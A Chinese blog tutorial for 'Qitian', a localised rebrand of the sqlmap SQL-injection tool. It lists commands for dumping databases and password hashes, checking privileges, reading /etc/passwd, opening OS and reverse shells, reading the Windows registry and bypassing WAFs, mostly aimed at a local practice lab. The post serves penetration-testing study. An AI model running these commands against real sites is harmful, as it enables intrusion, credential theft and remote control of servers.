• 超详细!魔改为中文sqlmap的使用教程


    超详细!魔改为中文sqlmap的使用教程

    魔改了一版中文版的SQLMAP,(关注猫鼠信安公众号,发送20230917获取下载链接)

    1.SQLMAP介绍

    Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、postgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、sybase和SAP MaxDB。
    Sqlmap采用了以下5中独特的SQL注入技术。

    基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
    基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。
    基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。
    联合查询注入,在可以使用union的情况下的注入。
    堆查询注入,可以同时执行多条语句时的注入。
      
      SQLmap的强大功能包括数据库指纹识别、数据库枚举、数据库提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。Sqlmap的功能强大到让人惊叹,当常规的注入工具不能利用SQL注入漏洞进行注入时,使用sqlmap会有意想不到的效果。

    下面是由猫鼠信安团队(关注猫鼠信安公众号,发送20230917获取下载链接),魔改为中文版的sqlmap,Qitian功能参数一模一样,
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述

    2.Qitian基础信息

    获取当前用户名称

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --current-user

    获取当前数据库名称

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --current-db

    获取表名

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” -D security --tables

    获取字段

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” -D security -T users --columns

    获取字段内容

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” -D security -T users -C id --dump

    3.Qitian进阶信息内容

    执行测试等级

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --level 2
    指定数据库类型

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --dbms “Mysql”
    列数据库用户

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --users

    列数据库

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --dbs

    数据库用户密码

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --passwords

    列出指定用户数据库密码

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --passwords -U root

    查看权限

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --privileges
    查看指定用户权限

    p>python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --privileges -U root

    是否是数据库管理员

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --is-dba

    枚举数据库用户角色

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” --roles

    导入用户自定义函数(获取系统权限!)

    Qitian/Qitian.py -u “http://url/news?id=1” --udf-inject

    cookie注入

    python Qitian/Qitian.py -u “http://url/news?id=1” --cookie “COOKIE_VALUE”

    获取banner信息

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” -b

    post注入

    python Qitian/Qitian.py -u “http://url/news?id=1” --data “id=3”

    指纹判别数据库类型

    python Qitian.py -u “http://127.0.0.1/sql/Less-1/?id=1” -f

    代理注入

    python Qitian/Qitian.py -u “http://url/news?id=1” --proxy"http://127.0.0.1:8118"

    指定关键词

    python Qitian/Qitian.py -u “http://url/news?id=1”–string"STRING_ON_TRUE_PAGE"

    执行系统命令

    python Qitian/Qitian.py -u “http://url/news?id=1” --file /etc/passwd

    统交互shell

    python Qitian/Qitian.py -u “http://url/news?id=1” --os-shell

    反弹shell

    python Qitian/Qitian.py -u “http://url/news?id=1” --os-pwn

    读取win系统注册表

    python Qitian/Qitian.py -u “http://url/news?id=1” --reg-read

    保存进度

    python Qitian/Qitian.py -u “http://url/news?id=1” --dbs-o “Qitian.log”

    恢复已保存进度

    python Qitian/Qitian.py -u “http://url/news?id=1” --dbs -o “Qitian.log” --resume

    3.Qitian绕过WAF

    python Qitian/Qitian.py -u “http://url/news?id=1” --tamper 指定脚本

  • 相关阅读:
    GO常用命令记录
    Android 源码 <Activity> 桌面启动一 [5]
    解决了个bug,想说点啥但又难以启齿
    Day17.1:静态与非静态的详解
    【校招VIP】java语言考点之关键字final
    atof函数的实现
    Mysql——三、SQL语句(上篇)
    EKF之雅克比矩阵(一)
    【面试算法——动态规划 19】最长回文子序列&& (hard)让字符串成为回文串的最少插入次数
    Android.bp语法和使用方法讲解
  • 原文地址:https://blog.csdn.net/weixin_43264067/article/details/132939975